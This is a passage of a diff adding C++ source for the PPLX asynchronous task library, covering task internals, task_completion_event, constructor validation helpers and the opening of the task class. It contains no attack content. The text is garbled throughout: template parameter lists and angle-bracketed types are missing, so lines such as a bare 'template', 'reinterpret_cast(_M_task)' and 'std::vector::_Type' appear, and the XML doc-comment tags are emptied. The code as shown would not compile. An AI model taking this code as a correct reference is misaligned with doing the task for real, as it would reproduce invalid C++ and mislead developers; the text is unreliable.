[_OuterTask](task<_InternalReturnType> _AncestorTask) { + if (_AncestorTask._GetImpl()->_IsCompleted()) + { + _OuterTask->_FinalizeAndRunContinuations(_AncestorTask._GetImpl()->_GetResult()); + } + else + { + _ASSERTE(_AncestorTask._GetImpl()->_IsCanceled()); + if (_AncestorTask._GetImpl()->_HasUserException()) + { + // Set _PropagatedFromAncestor to false, since _AncestorTask is not an ancestor of + // _UnwrappedTask. Instead, it is the enclosing task. + _OuterTask->_CancelWithExceptionHolder(_AncestorTask._GetImpl()->_GetExceptionHolder(), false); + } + else + { + _OuterTask->_Cancel(true); + } + } + }, + nullptr, + details::_DefaultAutoInline); + } + + scheduler_ptr _GetScheduler() const { return _M_TaskCollection._GetScheduler(); } + + // Tracks the internal state of the task + std::atomic<_TaskInternalState> _M_TaskState; + // Set to true either if the ancestor task had the flag set to true, or if the lambda that does the work of this + // task returns an async operation or async action that is unwrapped by the runtime. + bool _M_fFromAsync; + // Set to true when a continuation unwraps a task or async operation. + bool _M_fUnwrappedTask; + + // An exception thrown by the task body is captured in an exception holder and it is shared with all value based + // continuations rooted at the task. The exception is 'observed' if the user invokes get()/wait() on any of the + // tasks that are sharing this exception holder. If the exception is not observed by the time the internal object + // owned by the shared pointer destructs, the process will fail fast. + std::shared_ptr<_ExceptionHolder> _M_exceptionHolder; + + ::pplx::extensibility::critical_section_t _M_ContinuationsCritSec; + + // The cancellation token state. + _CancellationTokenState* _M_pTokenState; + + // The registration on the token. + _CancellationTokenRegistration* _M_pRegistration; + + typedef _ContinuationTaskHandleBase* _ContinuationList; + _ContinuationList _M_Continuations; + + // The async task collection wrapper + ::pplx::details::_TaskCollection_t _M_TaskCollection; + + // Callstack for function call (constructor or .then) that created this task impl. + _TaskCreationCallstack _M_pTaskCreationCallstack; + + _TaskEventLogger _M_taskEventLogger; + +private: + // Must not be copied by value: + _Task_impl_base(const _Task_impl_base&); + _Task_impl_base const& operator=(_Task_impl_base const&); +}; + +#if PPLX_TASK_ASYNC_LOGGING +inline void _TaskEventLogger::_LogTaskCompleted() +{ + if (_M_scheduled) + { + ::Windows::Foundation::AsyncStatus _State; + if (_M_task->_IsCompleted()) + _State = ::Windows::Foundation::AsyncStatus::Completed; + else if (_M_task->_HasUserException()) + _State = ::Windows::Foundation::AsyncStatus::Error; + else + _State = ::Windows::Foundation::AsyncStatus::Canceled; + + if (details::_IsCausalitySupported()) + { + ::Windows::Foundation::Diagnostics::AsyncCausalityTracer::TraceOperationCompletion( + ::Windows::Foundation::Diagnostics::CausalityTraceLevel::Required, + ::Windows::Foundation::Diagnostics::CausalitySource::Library, + _PPLTaskCausalityPlatformID, + reinterpret_cast(_M_task), + _State); + } + } +} +#endif + +/// +/// The implementation of a first-class task. This structure contains the task group used to execute +/// the task function and handles the scheduling. The _Task_impl is created as a shared_ptr +/// member of the the public task class, so its destruction is handled automatically. +/// +/// +/// The result type of this task. +/// +/**/ +template +struct _Task_impl : public _Task_impl_base +{ +#if defined(__cplusplus_winrt) + typedef Windows::Foundation::IAsyncOperation::_Value> + _AsyncOperationType; +#endif // defined(__cplusplus_winrt) + _Task_impl(_CancellationTokenState* _Ct, scheduler_ptr _Scheduler_arg) : _Task_impl_base(_Ct, _Scheduler_arg) + { +#if defined(__cplusplus_winrt) + _M_unwrapped_async_op = nullptr; +#endif /* defined (__cplusplus_winrt) */ + } + + virtual ~_Task_impl() + { + // We must invoke _DeregisterCancellation in the derived class destructor. Calling it in the base class + // destructor could cause a partially initialized _Task_impl to be in the list of registrations for a + // cancellation token. + _DeregisterCancellation(); + } + + virtual bool _CancelAndRunContinuations(bool _SynchronousCancel, + bool _UserException, + bool _PropagatedFromAncestor, + const std::shared_ptr<_ExceptionHolder>& _ExceptionHolder_arg) + { + bool _RunContinuations = false; + { + ::pplx::extensibility::scoped_critical_section_t _LockHolder(_M_ContinuationsCritSec); + if (_UserException) + { + _ASSERTE(_SynchronousCancel && !_IsCompleted()); + // If the state is _Canceled, the exception has to be coming from an ancestor. + _ASSERTE(!_IsCanceled() || _PropagatedFromAncestor); + + // We should not be canceled with an exception more than once. + _ASSERTE(!_HasUserException()); + + // Mark _PropagatedFromAncestor as used. + (void)_PropagatedFromAncestor; + + if (_M_TaskState == _Canceled) + { + // If the task has finished canceling there should not be any continuation records in the array. + return false; + } + else + { + _ASSERTE(_M_TaskState != _Completed); + _M_exceptionHolder = _ExceptionHolder_arg; + } + } + else + { + // Completed is a non-cancellable state, and if this is an asynchronous cancel, we're unable to do + // better than the last async cancel which is to say, cancellation is already initiated, so return + // early. + if (_IsCompleted() || _IsCanceled() || (_IsPendingCancel() && !_SynchronousCancel)) + { + _ASSERTE(!_IsCompleted() || !_HasUserException()); + return false; + } + _ASSERTE(!_SynchronousCancel || !_HasUserException()); + } + + if (_SynchronousCancel) + { + // Be aware that this set must be done BEFORE _M_Scheduled being set, or race will happen between this + // and wait() + _M_TaskState = _Canceled; + // Cancellation completes the task, so all dependent tasks must be run to cancel them + // They are canceled when they begin running (see _RunContinuation) and see that their + // ancestor has been canceled. + _RunContinuations = true; + } + else + { + _ASSERTE(!_UserException); + + if (_IsStarted()) + { +#if defined(__cplusplus_winrt) + if (_M_unwrapped_async_op != nullptr) + { + // We will only try to cancel async operation but not unwrapped tasks, since unwrapped tasks + // cannot be canceled without its token. + _M_unwrapped_async_op->Cancel(); + } +#endif /* defined (__cplusplus_winrt) */ + _M_TaskCollection._Cancel(); + } + + // The _M_TaskState variable transitions to _Canceled when cancellation is completed (the task is not + // executing user code anymore). In the case of a synchronous cancel, this can happen immediately, + // whereas with an asynchronous cancel, the task has to move from _Started to _PendingCancel before it + // can move to _Canceled when it is finished executing. + _M_TaskState = _PendingCancel; + + _M_taskEventLogger._LogCancelTask(); + } + } + + // Only execute continuations and mark the task as completed if we were able to move the task to the _Canceled + // state. + if (_RunContinuations) + { + _M_TaskCollection._Complete(); + + if (_M_Continuations) + { + // Scheduling cancellation with automatic inlining. + _ScheduleFuncWithAutoInline([=]() { _RunTaskContinuations(); }, details::_DefaultAutoInline); + } + } + return true; + } + + void _FinalizeAndRunContinuations(_ReturnType _Result) + { + _M_Result.Set(_Result); + + { + // + // Hold this lock to ensure continuations being concurrently either get added + // to the _M_Continuations vector or wait for the result + // + ::pplx::extensibility::scoped_critical_section_t _LockHolder(_M_ContinuationsCritSec); + + // A task could still be in the _Created state if it was created with a task_completion_event. + // It could also be in the _Canceled state for the same reason. + _ASSERTE(!_HasUserException() && !_IsCompleted()); + if (_IsCanceled()) + { + return; + } + + // Always transition to "completed" state, even in the face of unacknowledged pending cancellation + _M_TaskState = _Completed; + } + _M_TaskCollection._Complete(); + _RunTaskContinuations(); + } + + // + // This method is invoked when the starts executing. The task returns early if this method returns true. + // + bool _TransitionedToStarted() + { + ::pplx::extensibility::scoped_critical_section_t _LockHolder(_M_ContinuationsCritSec); + // Canceled state could only result from antecedent task's canceled state, but that code path will not reach + // here. + _ASSERTE(!_IsCanceled()); + if (_IsPendingCancel()) return false; + + _ASSERTE(_IsCreated()); + _M_TaskState = _Started; + return true; + } + +#if defined(__cplusplus_winrt) + void _SetUnwrappedAsyncOp(_AsyncOperationType ^ _AsyncOp) + { + ::pplx::extensibility::scoped_critical_section_t _LockHolder(_M_ContinuationsCritSec); + // Cancel the async operation if the task itself is canceled, since the thread that canceled the task missed it. + if (_IsPendingCancel()) + { + _ASSERTE(!_IsCanceled()); + _AsyncOp->Cancel(); + } + else + { + _M_unwrapped_async_op = _AsyncOp; + } + } +#endif /* defined (__cplusplus_winrt) */ + + // Return true if the task has reached a terminal state + bool _IsDone() { return _IsCompleted() || _IsCanceled(); } + + _ReturnType _GetResult() { return _M_Result.Get(); } + + _ResultHolder<_ReturnType> _M_Result; // this means that the result type must have a public default ctor. +#if defined(__cplusplus_winrt) + _AsyncOperationType ^ _M_unwrapped_async_op; +#endif /* defined (__cplusplus_winrt) */ +}; + +template +struct _Task_completion_event_impl +{ +private: + _Task_completion_event_impl(const _Task_completion_event_impl&); + _Task_completion_event_impl& operator=(const _Task_completion_event_impl&); + +public: + typedef std::vector::_Type> _TaskList; + + _Task_completion_event_impl() : _M_fHasValue(false), _M_fIsCanceled(false) {} + + bool _HasUserException() { return _M_exceptionHolder != nullptr; } + + ~_Task_completion_event_impl() + { + for (auto _TaskIt = _M_tasks.begin(); _TaskIt != _M_tasks.end(); ++_TaskIt) + { + _ASSERTE(!_M_fHasValue && !_M_fIsCanceled); + // Cancel the tasks since the event was never signaled or canceled. + (*_TaskIt)->_Cancel(true); + } + } + + // We need to protect the loop over the array, so concurrent_vector would not have helped + _TaskList _M_tasks; + ::pplx::extensibility::critical_section_t _M_taskListCritSec; + _ResultHolder<_ResultType> _M_value; + std::shared_ptr<_ExceptionHolder> _M_exceptionHolder; + std::atomic _M_fHasValue; + std::atomic _M_fIsCanceled; +}; + +// Utility method for dealing with void functions +inline std::function<_Unit_type(void)> _MakeVoidToUnitFunc(const std::function& _Func) +{ + return [=]() -> _Unit_type { + _Func(); + return _Unit_type(); + }; +} + +template +std::function<_Type(_Unit_type)> _MakeUnitToTFunc(const std::function<_Type(void)>& _Func) +{ + return [=](_Unit_type) -> _Type { return _Func(); }; +} + +template +std::function<_Unit_type(_Type)> _MakeTToUnitFunc(const std::function& _Func) +{ + return [=](_Type t) -> _Unit_type { + _Func(t); + return _Unit_type(); + }; +} + +inline std::function<_Unit_type(_Unit_type)> _MakeUnitToUnitFunc(const std::function& _Func) +{ + return [=](_Unit_type) -> _Unit_type { + _Func(); + return _Unit_type(); + }; +} +} // namespace details + +/// +/// The task_completion_event class allows you to delay the execution of a task until a condition is +/// satisfied, or start a task in response to an external event. +/// +/// +/// The result type of this task_completion_event class. +/// +/// +/// Use a task created from a task completion event when your scenario requires you to create a task that will +/// complete, and thereby have its continuations scheduled for execution, at some point in the future. The +/// task_completion_event must have the same type as the task you create, and calling the set method on the +/// task completion event with a value of that type will cause the associated task to complete, and provide that +/// value as a result to its continuations. If the task completion event is never signaled, any tasks created +/// from it will be canceled when it is destructed. task_completion_event behaves like a smart +/// pointer, and should be passed by value. +/// +/// +/**/ +template +class task_completion_event +{ +public: + /// + /// Constructs a task_completion_event object. + /// + /**/ + task_completion_event() : _M_Impl(std::make_shared>()) {} + + /// + /// Sets the task completion event. + /// + /// + /// The result to set this event with. + /// + /// + /// The method returns true if it was successful in setting the event. It returns false if the + /// event is already set. + /// + /// + /// In the presence of multiple or concurrent calls to set, only the first call will succeed and its + /// result (if any) will be stored in the task completion event. The remaining sets are ignored and the method + /// will return false. When you set a task completion event, all the tasks created from that event will + /// immediately complete, and its continuations, if any, will be scheduled. Task completion objects that have a + /// other than void will pass the value to + /// their continuations. + /// + /**/ + bool set(_ResultType _Result) + const // 'const' (even though it's not deep) allows to safely pass events by value into lambdas + { + // Subsequent sets are ignored. This makes races to set benign: the first setter wins and all others are + // ignored. + if (_IsTriggered()) + { + return false; + } + + _TaskList _Tasks; + bool _RunContinuations = false; + { + ::pplx::extensibility::scoped_critical_section_t _LockHolder(_M_Impl->_M_taskListCritSec); + + if (!_IsTriggered()) + { + _M_Impl->_M_value.Set(_Result); + _M_Impl->_M_fHasValue = true; + + _Tasks.swap(_M_Impl->_M_tasks); + _RunContinuations = true; + } + } + + if (_RunContinuations) + { + for (auto _TaskIt = _Tasks.begin(); _TaskIt != _Tasks.end(); ++_TaskIt) + { + // If current task was canceled by a cancellation_token, it would be in cancel pending state. + if ((*_TaskIt)->_IsPendingCancel()) + (*_TaskIt)->_Cancel(true); + else + { + // Tasks created with task_completion_events can be marked as async, (we do this in when_any and + // when_all if one of the tasks involved is an async task). Since continuations of async tasks can + // execute inline, we need to run continuations after the lock is released. + (*_TaskIt)->_FinalizeAndRunContinuations(_M_Impl->_M_value.Get()); + } + } + if (_M_Impl->_HasUserException()) + { + _M_Impl->_M_exceptionHolder.reset(); + } + return true; + } + + return false; + } + + template + __declspec(noinline) // Ask for no inlining so that the _ReturnAddress intrinsic gives us the expected result + bool set_exception( + _E _Except) const // 'const' (even though it's not deep) allows to safely pass events by value into lambdas + { + // It is important that PPLX_CAPTURE_CALLSTACK() evaluate to the instruction after the call instruction for + // set_exception. + return _Cancel(std::make_exception_ptr(_Except), PPLX_CAPTURE_CALLSTACK()); + } + + /// + /// Propagates an exception to all tasks associated with this event. + /// + /// + /// The exception_ptr that indicates the exception to set this event with. + /// + /**/ + __declspec(noinline) // Ask for no inlining so that the PPLX_CAPTURE_CALLSTACK gives us the expected result + bool set_exception(std::exception_ptr _ExceptionPtr) + const // 'const' (even though it's not deep) allows to safely pass events by value into lambdas + { + // It is important that PPLX_CAPTURE_CALLSTACK() evaluate to the instruction after the call instruction for + // set_exception. + return _Cancel(_ExceptionPtr, PPLX_CAPTURE_CALLSTACK()); + } + + /// + /// Internal method to cancel the task_completion_event. Any task created using this event will be marked as + /// canceled if it has not already been set. + /// + bool _Cancel() const + { + // Cancel with the stored exception if one exists. + return _CancelInternal(); + } + + /// + /// Internal method to cancel the task_completion_event with the exception provided. Any task created using this + /// event will be canceled with the same exception. + /// + template + bool _Cancel( + _ExHolderType _ExHolder, + const details::_TaskCreationCallstack& _SetExceptionAddressHint = details::_TaskCreationCallstack()) const + { + bool _Canceled; + if (_StoreException(_ExHolder, _SetExceptionAddressHint)) + { + _Canceled = _CancelInternal(); + _ASSERTE(_Canceled); + } + else + { + _Canceled = false; + } + return _Canceled; + } + + /// + /// Internal method that stores an exception in the task completion event. This is used internally by when_any. + /// Note, this does not cancel the task completion event. A task completion event with a stored exception + /// can bet set() successfully. If it is canceled, it will cancel with the stored exception, if one is present. + /// + template + bool _StoreException( + _ExHolderType _ExHolder, + const details::_TaskCreationCallstack& _SetExceptionAddressHint = details::_TaskCreationCallstack()) const + { + ::pplx::extensibility::scoped_critical_section_t _LockHolder(_M_Impl->_M_taskListCritSec); + if (!_IsTriggered() && !_M_Impl->_HasUserException()) + { + // Create the exception holder only if we have ensured there we will be successful in setting it onto the + // task completion event. Failing to do so will result in an unobserved task exception. + _M_Impl->_M_exceptionHolder = _ToExceptionHolder(_ExHolder, _SetExceptionAddressHint); + return true; + } + return false; + } + + /// + /// Tests whether current event has been either Set, or Canceled. + /// + bool _IsTriggered() const { return _M_Impl->_M_fHasValue || _M_Impl->_M_fIsCanceled; } + +private: + static std::shared_ptr _ToExceptionHolder( + const std::shared_ptr& _ExHolder, const details::_TaskCreationCallstack&) + { + return _ExHolder; + } + + static std::shared_ptr _ToExceptionHolder( + std::exception_ptr _ExceptionPtr, const details::_TaskCreationCallstack& _SetExceptionAddressHint) + { + return std::make_shared(_ExceptionPtr, _SetExceptionAddressHint); + } + + template + friend class task; // task can register itself with the event by calling the private _RegisterTask + template + friend class task_completion_event; + + typedef typename details::_Task_completion_event_impl<_ResultType>::_TaskList _TaskList; + + /// + /// Cancels the task_completion_event. + /// + bool _CancelInternal() const + { + // Cancellation of task completion events is an internal only utility. Our usage is such that _CancelInternal + // will never be invoked if the task completion event has been set. + _ASSERTE(!_M_Impl->_M_fHasValue); + if (_M_Impl->_M_fIsCanceled) + { + return false; + } + + _TaskList _Tasks; + bool _Cancel = false; + { + ::pplx::extensibility::scoped_critical_section_t _LockHolder(_M_Impl->_M_taskListCritSec); + _ASSERTE(!_M_Impl->_M_fHasValue); + if (!_M_Impl->_M_fIsCanceled) + { + _M_Impl->_M_fIsCanceled = true; + _Tasks.swap(_M_Impl->_M_tasks); + _Cancel = true; + } + } + + bool _UserException = _M_Impl->_HasUserException(); + + if (_Cancel) + { + for (auto _TaskIt = _Tasks.begin(); _TaskIt != _Tasks.end(); ++_TaskIt) + { + // Need to call this after the lock is released. See comments in set(). + if (_UserException) + { + (*_TaskIt)->_CancelWithExceptionHolder(_M_Impl->_M_exceptionHolder, true); + } + else + { + (*_TaskIt)->_Cancel(true); + } + } + } + return _Cancel; + } + + /// + /// Register a task with this event. This function is called when a task is constructed using + /// a task_completion_event. + /// + void _RegisterTask(const typename details::_Task_ptr<_ResultType>::_Type& _TaskParam) + { + ::pplx::extensibility::scoped_critical_section_t _LockHolder(_M_Impl->_M_taskListCritSec); + + // If an exception was already set on this event, then cancel the task with the stored exception. + if (_M_Impl->_HasUserException()) + { + _TaskParam->_CancelWithExceptionHolder(_M_Impl->_M_exceptionHolder, true); + } + else if (_M_Impl->_M_fHasValue) + { + _TaskParam->_FinalizeAndRunContinuations(_M_Impl->_M_value.Get()); + } + else + { + _M_Impl->_M_tasks.push_back(_TaskParam); + } + } + + std::shared_ptr> _M_Impl; +}; + +/// +/// The task_completion_event class allows you to delay the execution of a task until a condition is +/// satisfied, or start a task in response to an external event. +/// +/// +/// Use a task created from a task completion event when your scenario requires you to create a task that will +/// complete, and thereby have its continuations scheduled for execution, at some point in the future. The +/// task_completion_event must have the same type as the task you create, and calling the set method on the +/// task completion event with a value of that type will cause the associated task to complete, and provide that +/// value as a result to its continuations. If the task completion event is never signaled, any tasks created +/// from it will be canceled when it is destructed. task_completion_event behaves like a smart +/// pointer, and should be passed by value. +/// +/// +/**/ +template<> +class task_completion_event +{ +public: + /// + /// Sets the task completion event. + /// + /// + /// The method returns true if it was successful in setting the event. It returns false if the + /// event is already set. + /// + /// + /// In the presence of multiple or concurrent calls to set, only the first call will succeed and its + /// result (if any) will be stored in the task completion event. The remaining sets are ignored and the method + /// will return false. When you set a task completion event, all the tasks created from that event will + /// immediately complete, and its continuations, if any, will be scheduled. Task completion objects that have a + /// other than void will pass the value to + /// their continuations. + /// + /**/ + bool set() const // 'const' (even though it's not deep) allows to safely pass events by value into lambdas + { + return _M_unitEvent.set(details::_Unit_type()); + } + + template + __declspec(noinline) // Ask for no inlining so that the _ReturnAddress intrinsic gives us the expected result + bool set_exception( + _E _Except) const // 'const' (even though it's not deep) allows to safely pass events by value into lambdas + { + return _M_unitEvent._Cancel(std::make_exception_ptr(_Except), PPLX_CAPTURE_CALLSTACK()); + } + + /// + /// Propagates an exception to all tasks associated with this event. + /// + /// + /// The exception_ptr that indicates the exception to set this event with. + /// + /**/ + __declspec( + noinline) // Ask for no inlining so that the PPLX_CAPTURE_CALLSTACK intrinsic gives us the expected result + bool set_exception(std::exception_ptr _ExceptionPtr) + const // 'const' (even though it's not deep) allows to safely pass events by value into lambdas + { + // It is important that PPLX_CAPTURE_CALLSTACK() evaluate to the instruction after the call instruction for + // set_exception. + return _M_unitEvent._Cancel(_ExceptionPtr, PPLX_CAPTURE_CALLSTACK()); + } + + /// + /// Cancel the task_completion_event. Any task created using this event will be marked as canceled if it has + /// not already been set. + /// + void _Cancel() const // 'const' (even though it's not deep) allows to safely pass events by value into lambdas + { + _M_unitEvent._Cancel(); + } + + /// + /// Cancel the task_completion_event with the exception holder provided. Any task created using this event will + /// be canceled with the same exception. + /// + void _Cancel(const std::shared_ptr& _ExHolder) const { _M_unitEvent._Cancel(_ExHolder); } + + /// + /// Method that stores an exception in the task completion event. This is used internally by when_any. + /// Note, this does not cancel the task completion event. A task completion event with a stored exception + /// can bet set() successfully. If it is canceled, it will cancel with the stored exception, if one is present. + /// + bool _StoreException(const std::shared_ptr& _ExHolder) const + { + return _M_unitEvent._StoreException(_ExHolder); + } + + /// + /// Test whether current event has been either Set, or Canceled. + /// + bool _IsTriggered() const { return _M_unitEvent._IsTriggered(); } + +private: + template + friend class task; // task can register itself with the event by calling the private _RegisterTask + + /// + /// Register a task with this event. This function is called when a task is constructed using + /// a task_completion_event. + /// + void _RegisterTask(details::_Task_ptr::_Type _TaskParam) + { + _M_unitEvent._RegisterTask(_TaskParam); + } + + // The void event contains an event a dummy type so common code can be used for events with void and non-void + // results. + task_completion_event _M_unitEvent; +}; + +namespace details +{ +// +// Compile-time validation helpers +// + +// Task constructor validation: issue helpful diagnostics for common user errors. Do not attempt full validation here. +// +// Anything callable is fine +template +auto _IsValidTaskCtor(_Ty _Param, int, int, int, int) -> decltype(_Param(), std::true_type()); + +#if defined(__cplusplus_winrt) +// Anything that has GetResults is fine: this covers all async operations +template +auto _IsValidTaskCtor(_Ty _Param, int, int, int, ...) -> decltype(_Param->GetResults(), std::true_type()); +#endif + +// Allow parameters with set: this covers task_completion_event +template +auto _IsValidTaskCtor(_Ty _Param, int, int, ...) + -> decltype(_Param.set(stdx::declval<_ReturnType>()), std::true_type()); + +template +auto _IsValidTaskCtor(_Ty _Param, int, ...) -> decltype(_Param.set(), std::true_type()); + +// All else is invalid +template +std::false_type _IsValidTaskCtor(_Ty _Param, ...); + +template +void _ValidateTaskConstructorArgs(_Ty _Param) +{ + static_assert(std::is_same(_Param, 0, 0, 0, 0)), std::true_type>::value, +#if defined(__cplusplus_winrt) + "incorrect argument for task constructor; can be a callable object, an asynchronous operation, or a " + "task_completion_event" +#else /* defined (__cplusplus_winrt) */ + "incorrect argument for task constructor; can be a callable object or a task_completion_event" +#endif /* defined (__cplusplus_winrt) */ + ); +#if defined(__cplusplus_winrt) + static_assert(!(std::is_same<_Ty, _ReturnType>::value && details::_IsIAsyncInfo<_Ty>::_Value), + "incorrect template argument for task; consider using the return type of the async operation"); +#endif /* defined (__cplusplus_winrt) */ +} + +#if defined(__cplusplus_winrt) +// Helpers for create_async validation +// +// A parameter lambda taking no arguments is valid +template +static auto _IsValidCreateAsync(_Ty _Param, int, int, int, int) -> decltype(_Param(), std::true_type()); + +// A parameter lambda taking an cancellation_token argument is valid +template +static auto _IsValidCreateAsync(_Ty _Param, int, int, int, ...) + -> decltype(_Param(cancellation_token::none()), std::true_type()); + +// A parameter lambda taking a progress report argument is valid +template +static auto _IsValidCreateAsync(_Ty _Param, int, int, ...) + -> decltype(_Param(details::_ProgressReporterCtorArgType()), std::true_type()); + +// A parameter lambda taking a progress report and a cancellation_token argument is valid +template +static auto _IsValidCreateAsync(_Ty _Param, int, ...) + -> decltype(_Param(details::_ProgressReporterCtorArgType(), cancellation_token::none()), std::true_type()); + +// All else is invalid +template +static std::false_type _IsValidCreateAsync(_Ty _Param, ...); +#endif /* defined (__cplusplus_winrt) */ + +/// +/// A helper class template that makes only movable functions be able to be passed to std::function +/// +template +struct _NonCopyableFunctorWrapper +{ + template, typename std::decay<_Tx>::type>::value>::type> + explicit _NonCopyableFunctorWrapper(_Tx&& f) : _M_functor {std::make_shared<_Ty>(std::forward<_Tx>(f))} + { + } + + template + auto operator()(_Args&&... args) -> decltype(std::declval<_Ty>()(std::forward<_Args>(args)...)) + { + return _M_functor->operator()(std::forward<_Args>(args)...); + } + + template + auto operator()(_Args&&... args) const -> decltype(std::declval<_Ty>()(std::forward<_Args>(args)...)) + { + return _M_functor->operator()(std::forward<_Args>(args)...); + } + + std::shared_ptr<_Ty> _M_functor; +}; + +template +struct _CopyableFunctor +{ + typedef _Ty _Type; +}; + +template +struct _CopyableFunctor< + _Ty, + typename std::enable_if::value && !std::is_copy_constructible<_Ty>::value>::type> +{ + typedef _NonCopyableFunctorWrapper<_Ty> _Type; +}; +} // namespace details +/// +/// A helper class template that transforms a continuation lambda that either takes or returns void, or both, into a +/// lambda that takes and returns a non-void type (details::_Unit_type is used to substitute for void). This is to +/// minimize the special handling required for 'void'. +/// +template +class _Continuation_func_transformer +{ +public: + static auto _Perform(std::function<_OutType(_InpType)> _Func) -> decltype(_Func) { return _Func; } +}; + +template +class _Continuation_func_transformer +{ +public: + static auto _Perform(std::function<_OutType(void)> _Func) -> decltype(details::_MakeUnitToTFunc<_OutType>(_Func)) + { + return details::_MakeUnitToTFunc<_OutType>(_Func); + } +}; + +template +class _Continuation_func_transformer<_InType, void> +{ +public: + static auto _Perform(std::function _Func) -> decltype(details::_MakeTToUnitFunc<_InType>(_Func)) + { + return details::_MakeTToUnitFunc<_InType>(_Func); + } +}; + +template<> +class _Continuation_func_transformer +{ +public: + static auto _Perform(std::function _Func) -> decltype(details::_MakeUnitToUnitFunc(_Func)) + { + return details::_MakeUnitToUnitFunc(_Func); + } +}; + +// A helper class template that transforms an intial task lambda returns void into a lambda that returns a non-void type +// (details::_Unit_type is used to substitute for void). This is to minimize the special handling required for 'void'. +template +class _Init_func_transformer +{ +public: + static auto _Perform(std::function<_RetType(void)> _Func) -> decltype(_Func) { return _Func; } +}; + +template<> +class _Init_func_transformer +{ +public: + static auto _Perform(std::function _Func) -> decltype(details::_MakeVoidToUnitFunc(_Func)) + { + return details::_MakeVoidToUnitFunc(_Func); + } +}; + +/// +/// The Parallel Patterns Library (PPL) task class. A task object represents work that can be executed +/// asynchronously, and concurrently with other tasks and parallel work produced by parallel algorithms in the +/// Concurrency Runtime. It produces a result of type on successful completion. +/// Tasks of type task<void> produce no result. A task can be waited upon and canceled independently of +/// other tasks. It can also be composed with other tasks using continuations(then), and +/// join(when_all) and choice(when_any) patterns. +/// +/// +/// The result type of this task. +/// +/// +/// For more information, see . +/// +/**/ +template +class task +{ +public: + /// + /// The type of the result an object of this class produces. + /// + /**/ + typedef _ReturnType result_type; + + /// + /// Constructs a task object. + /// + /// + /// The default constructor for a task is only present in order to allow tasks to be used within + /// containers. A default constructed task cannot be used until you assign a valid task to it. Methods such as + /// get, wait or then will throw an invalid_argument exception when called on a default constructed task. A task that is + /// created from a task_completion_event will complete (and have its continuations scheduled) when the + /// task completion event is set. The version of the constructor that takes a cancellation token + /// creates a task that can be canceled using the cancellation_token_source the token was obtained from. + /// Tasks created without a cancellation token are not cancelable. Tasks created from a + /// Windows::Foundation::IAsyncInfo interface or a lambda that returns an IAsyncInfo interface + /// reach their terminal state when the enclosed Windows Runtime asynchronous operation or action completes. + /// Similarly, tasks created from a lambda that returns a task<result_type> reach their terminal + /// state when the inner task reaches its terminal state, and not when the lambda returns. + /// task behaves like a smart pointer and is safe to pass around by value. It can be accessed by + /// multiple threads without the need for locks. The constructor overloads that take a + /// Windows::Foundation::IAsyncInfo interface or a lambda returning such an interface, are only available to + /// Windows Store apps. For more information, see . + /// + /**/ + task() : _M_Impl(nullptr) + { + // The default constructor should create a task with a nullptr impl. This is a signal that the + // task is not usable and should throw if any wait(), get() or then() APIs are used. + } + + /// + /// Constructs a task object. + /// + /// + /// The type of the parameter from which the task is to be constructed. + /// + /// + /// The parameter from which the task is to be constructed. This could be a lambda, a function object, a + /// task_completion_event<result_type> object, or a Windows::Foundation::IAsyncInfo if you are + /// using tasks in your Windows Store app. The lambda or function object should be a type equivalent to + /// std::function<X(void)>, where X can be a variable of type result_type, + /// task<result_type>, or a Windows::Foundation::IAsyncInfo in Windows Store apps. + /// + /// + /// The cancellation token to associate with this task. A task created without a cancellation token cannot be + /// canceled. It implicitly receives the token cancellation_token::none(). + /// + /// + /// The default constructor for a task is only present in order to allow tasks to be used within + /// containers. A default constructed task cannot be used until you assign a valid task to it. Methods such as + /// get, wait or then will throw an invalid_argument exception when called on a default constructed task. A task that is + /// created from a task_completion_event will complete (and have its continuations scheduled) when the + /// task completion event is set. The version of the constructor that takes a cancellation token + /// creates a task that can be canceled using the cancellation_token_source the token was obtained from. + /// Tasks created without a cancellation token are not cancelable. Tasks created from a + /// Windows::Foundation::IAsyncInfo interface or a lambda that returns an IAsyncInfo interface + /// reach their terminal state when the enclosed Windows Runtime asynchronous operation or action completes. + /// Similarly, tasks created from a lambda that returns a task<result_type> reach their terminal + /// state when the inner task reaches its terminal state, and not when the lambda returns. + /// task behaves like a smart pointer and is safe to pass around by value. It can be accessed by + /// multiple threads without the need for locks. The constructor overloads that take a + /// Windows::Foundation::IAsyncInfo interface or a lambda returning such an interface, are only available to + /// Windows Store apps. For more information, see . + /// + /**/ + template + __declspec(noinline) // Ask for no inlining so that the PPLX_CAPTURE_CALLSTACK gives us the expected result + explicit task(_Ty _Param) + { + task_options _TaskOptions; + details::_ValidateTaskConstructorArgs<_ReturnType, _Ty>(_Param); + + _CreateImpl(_TaskOptions.get_cancellation_token()._GetImplValue(), _TaskOptions.get_scheduler()); + // Do not move the next line out of this function. It is important that PPLX_CAPTURE_CALLSTACK() evaluate to the + // the call site of the task constructor. + _SetTaskCreationCallstack(PPLX_CAPTURE_CALLSTACK()); + + _TaskInitMaybeFunctor(_Param, details::_IsCallable(_Param, 0)); + } + + /// + /// Constructs a task object. + /// + /// + /// The type of the parameter from which the task is to be constructed. + /// + /// + /// The parameter from which the task is to be constructed. This could be a lambda, a function object, a + /// task_completion_event<result_type> object, or a Windows::Foundation::IAsyncInfo if you are + /// using tasks in your Windows Store app. The lambda or function object should be a type equivalent to + /// std::function<X(void)>, where X can be a variable of type result_type, + /// task<result_type>, or a Windows::Foundation::IAsyncInfo in Windows Store apps. + /// + /// + /// The task options include cancellation token, scheduler etc + /// + /// + /// The default constructor for a task is only present in order to allow tasks to be used within + /// containers. A default constructed task cannot be used until you assign a valid task to it. Methods such as + /// get, wait or then will throw an invalid_argument exception when called on a default constructed task. A task that is + /// created from a task_completion_event will complete (and have its continuations scheduled) when the + /// task completion event is set. The version of the constructor that takes a cancellation token + /// creates a task that can be canceled using the cancellation_token_source the token was obtained from. + /// Tasks created without a cancellation token are not cancelable. Tasks created from a + /// Windows::Foundation::IAsyncInfo interface or a lambda that returns an IAsyncInfo interface + /// reach their terminal state when the enclosed Windows Runtime asynchronous operation or action completes. + /// Similarly, tasks created from a lambda that returns a task<result_type> reach their terminal + /// state when the inner task reaches its terminal state, and not when the lambda returns. + /// task behaves like a smart pointer and is safe to pass around by value. It can be accessed by + /// multiple threads without the need for locks. The constructor overloads that take a + /// Windows::Foundation::IAsyncInfo interface or a lambda returning such an interface, are only available to + /// Windows Store apps. For more information, see . + /// + /**/ + template + __declspec(noinline) // Ask for no inlining so that the PPLX_CAPTURE_CALLSTACK gives us the expected result + explicit task(_Ty _Param, const task_options& _TaskOptions) + { + details::_ValidateTaskConstructorArgs<_ReturnType, _Ty>(_Param); + + 